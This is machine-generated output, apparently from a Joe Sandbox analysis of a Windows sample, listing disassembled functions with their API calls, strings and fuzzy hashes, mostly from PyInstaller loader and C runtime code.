                                                                                                                                                                                                  • Opcode ID: a59d17f06b1bd9d842be46a7f28cfe95a224e8e552fd04205d7b926c9701eb9f
                                                                                                                                                                                                  • Instruction ID: 89c6ee3a53aed65a95843d7eb49c141ce551050219581523ffa6570111e63dd4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a59d17f06b1bd9d842be46a7f28cfe95a224e8e552fd04205d7b926c9701eb9f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C1B536B18A4285EB10DF68E4806AD3761FB89B98B130336DA9E577E5CF78D195C301
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                  • Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                                                                                                                  • Instruction ID: 431935d7e2acf15eedf4495fdeb90a30d818f9cb70417d1456e7679c28ab53ef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71D1C332A28F4186EB20AF24D5403ADBBA0FB457A8F540135EE4D57B9ACF38F499C750
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D3440: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?,00007FFEEE1DAC33,?,?,?), ref: 00007FFEEE1D344A
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D3440: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?,00007FFEEE1DAC33,?,?,?), ref: 00007FFEEE1D3490
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE273FF0: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FFEEE274030
                                                                                                                                                                                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000), ref: 00007FFEEE274397
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000), ref: 00007FFEEE2743A3
                                                                                                                                                                                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000), ref: 00007FFEEE2743E3
                                                                                                                                                                                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000), ref: 00007FFEEE274432
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000), ref: 00007FFEEE27443F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$FullNamePath$CurrentDirectory
                                                                                                                                                                                                  • String ID: .$:
                                                                                                                                                                                                  • API String ID: 3092725408-4202072812
                                                                                                                                                                                                  • Opcode ID: ef35eeac8d6858098a0af63d7695292964ee2a00a6a270ecab81768e333bc854
                                                                                                                                                                                                  • Instruction ID: a0be5afdbd22f3ad65b03dba113f8dc4a9efb08f09a14e0956d9180b2af96f1a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef35eeac8d6858098a0af63d7695292964ee2a00a6a270ecab81768e333bc854
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02515E61F0861389FB116FB0F8503BD26A0AF98748F134135DE8D67AB5DFBCA4919212
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7102C3834), ref: 00007FF7102C7CE4
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF7102C3834), ref: 00007FF7102C7D2C
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7E10: GetEnvironmentVariableW.KERNEL32(00007FF7102C365F), ref: 00007FF7102C7E47
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7102C7E69
                                                                                                                                                                                                    • Part of subcall function 00007FF7102D7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7102D7561
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C26C0: MessageBoxW.USER32 ref: 00007FF7102C2736
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                  • API String ID: 740614611-1339014028
                                                                                                                                                                                                  • Opcode ID: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
                                                                                                                                                                                                  • Instruction ID: 72cade6ba44692d7d0f2e993341f85e6715edf429befd0392613975a37fa264d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8041AF12A29E4341EA20BB25AA552F9DA55BF45BB0FC04031EE0E57796EE3CF90C8720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: NameName::$Name::doName::operator+Pchar
                                                                                                                                                                                                  • String ID: `non-type-template-parameter
                                                                                                                                                                                                  • API String ID: 3026640183-4247534891
                                                                                                                                                                                                  • Opcode ID: 8de7eb83a26ee2879d9e7f3dce981534833e223cfe94a637316e027b59d68b0d
                                                                                                                                                                                                  • Instruction ID: ebf31aebbc40cd6e8c2552328f818bee5ca2b3b9fa74adad163a82f242ff751a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8de7eb83a26ee2879d9e7f3dce981534833e223cfe94a637316e027b59d68b0d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE417F22E0879695E750CF11F4806BC33A5BB99B84F578436DA8D17BE9DFB8E815C302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$AddressProcValue
                                                                                                                                                                                                  • String ID: FlsGetValue$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 3663398396-552164261
                                                                                                                                                                                                  • Opcode ID: 948fc83682bb285d1de66210e03cd83af409993909cd05a65e03d11a14740bb0
                                                                                                                                                                                                  • Instruction ID: 5a49192ff944b5286fa0d1ee82fb4b79e7360e7027875333092e2480e5abe831
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 948fc83682bb285d1de66210e03cd83af409993909cd05a65e03d11a14740bb0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9519D61B08B52C2EA559F15B8003796391AF88BA5F4B4236DDDD477B4EFBCE8858302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Name::doName::operator+Name::operator+=Pchar$NameName::Name::append
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3659116837-0
                                                                                                                                                                                                  • Opcode ID: ba15799b0e7ceb7b55bd43d09b27d58f4f49837068a18498ec1ca158e5473965
                                                                                                                                                                                                  • Instruction ID: 8db570d5e2f6f9f2407ae7a88cfe72c08c2e3cc9468cec29743d5e2e54855614
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba15799b0e7ceb7b55bd43d09b27d58f4f49837068a18498ec1ca158e5473965
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9614D32A08B5689F721CF64F8807BC37A6AB88748F474435DA8D077A9EFB9D545C342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD06D
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD07B
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD0A5
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD113
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7102CD29A,?,?,?,00007FF7102CCF8C,?,?,?,00007FF7102CCB89), ref: 00007FF7102CD11F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                  • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                  • Instruction ID: bc55b2914dc31ce8cbee4c269d15667b4e04859bdba50843209f068e3f4486c4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2831A421A2AE4291EE12BB16A940675AB94BF45BB4F9A0535DD1D0B380EF3CF44A8320
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFEEE1D2616
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFEEE1D265D
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D26A0: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FFEEE1D2690), ref: 00007FFEEE1D26CC
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D26A0: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FFEEE1D2690), ref: 00007FFEEE1D26E8
                                                                                                                                                                                                  • TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFEEE212B3C
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFEEE212B52
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalErrorLastSection$AddressEnterLeaveProcValue
                                                                                                                                                                                                  • String ID: FlsGetValue$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 2861905401-552164261
                                                                                                                                                                                                  • Opcode ID: 9d82342594002ce3bbd8b4bd2bb79a11808f388563f9c3ff704688b0f4c3bab2
                                                                                                                                                                                                  • Instruction ID: 852a2e9bca044a7dd596326b771b15fe24a86d1a7ba238355503045d486c14de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d82342594002ce3bbd8b4bd2bb79a11808f388563f9c3ff704688b0f4c3bab2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE315362B0974186FA149F28F8503756395AB8C3A0F474239DA9D437B8EFBCE945C742
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFEEE1D4A45), ref: 00007FFEEE1D6058
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFEEE1D4A45), ref: 00007FFEEE1D60A8
                                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE1D4A45), ref: 00007FFEEE213356
                                                                                                                                                                                                  • TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FFEEE1D4A45), ref: 00007FFEEE2133B9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$AddressProcValue
                                                                                                                                                                                                  • String ID: FlsGetValue$LCMapStringEx
                                                                                                                                                                                                  • API String ID: 3663398396-552164261
                                                                                                                                                                                                  • Opcode ID: 78ca7522fdfa8cbe323af7358c6e3b25300f47634eb04763555a5be60e670504
                                                                                                                                                                                                  • Instruction ID: ec9f076fa13e30eadbe9de460ae33fddec0c31fed65130fe8aee403f29102561
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78ca7522fdfa8cbe323af7358c6e3b25300f47634eb04763555a5be60e670504
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4731E221B1970282FA549F14F8106783391AF8CB90F075239DDDD477B8EEACE9448341
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE1D6342,?,?,?,00007FFEEE1D34B6,?,?,?,00007FFEEE2139B1), ref: 00007FFEEE1DC04A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                  • API String ID: 1029625771-537541572
                                                                                                                                                                                                  • Opcode ID: 6db79fdddd998107a66d735d21890402ca099e4a773b4f9534cfcd9fd7362131
                                                                                                                                                                                                  • Instruction ID: 0c74173e75424db57d64b13ced9efa9fb40ac03d41da8c09f644f578111363df
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6db79fdddd998107a66d735d21890402ca099e4a773b4f9534cfcd9fd7362131
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0219321619B4681EE149F66B4443786295EF8DFE0F1B0636CEAE477E4DFBCE0418301
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                                                  • Opcode ID: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
                                                                                                                                                                                                  • Instruction ID: 62abb6dec056d0bf7922310e62cf80b4909010ec0fda0fd966d5bb330f58853b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31215121A0CE4342EB10AB55E94426AEBA1FF957B4F900635EA6D43BE4DF7CF5488720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                  • Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                                                  • Instruction ID: 108f13621333e7c22e64139f4c076ac5a51fce8e50df9ef2037d7fcbc7ce2b24
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83214C22B0CE4242FAA57326565653EE9825F487B0FD44734E93E07BD6DE6CFC094721
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                  • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                  • API String ID: 3971115935-1149178304
                                                                                                                                                                                                  • Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                                                  • Instruction ID: 699346d36107fea3c5fff7d510a2f4ef19bc0b37fb5138230b9c8bf460b0e385
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F211272618E8582E721AB10F4516DBB764FB887D4F800136EACD63B98DF7CE54ACB50
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
